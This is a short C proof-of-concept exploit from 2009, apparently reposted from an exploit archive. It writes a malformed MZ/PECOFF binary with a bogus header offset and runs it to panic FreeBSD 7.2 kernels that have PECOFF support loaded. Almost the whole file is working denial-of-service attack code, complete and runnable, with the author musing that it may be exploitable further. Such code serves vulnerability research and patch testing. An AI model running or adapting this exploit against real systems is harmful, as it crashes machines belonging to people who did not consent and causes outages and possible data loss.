/* pecoff_panic.c
*
* by Shaun Colley, 20 July 2009
*
* this code will panic the freebsd kernel due to a bug in the PECOFF executable loader
* code ('options PECOFF_SUPPORT' in kernel config or `kldload pecoff`)
*
* panic(9) is in vm_fault due to a page fault. the panic seems to be caused in
* generic_bcopy...probably hitting a guard page..maybe exploitable(??) but this is just
* a DoS at the moment :) (ugly code btw)
*
* tested on freebsd 7.2-RELEASE
*
* - shaun
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
int main() {
int i, fd;
system("rm -rf evilprog.exe; touch evilprog.exe");
fd = open("evilprog.exe", O_WRONLY);
char buf[0x3a+2+0x04+4000];
buf[0] = 'M';
buf[1] = 'Z'; /* magic */
for(i = 2; i<0x3c; i++) buf[i] = 'a';
buf[0x3c] = 0xee;
buf[0x3d] = 0xee;
buf[0x3e] = 0xee;
buf[0x3f] = 0xee;
for(i = 0x40; i<(0x40+4000); i++) buf[i] = 0x61;
write(fd, buf, 0x3a+2+0x04+4000);
close(fd);
system("chmod 700 evilprog.exe");
system("./evilprog.exe"); /* run the dodgy PECOFF binary */
}
// sebug.net
暂无评论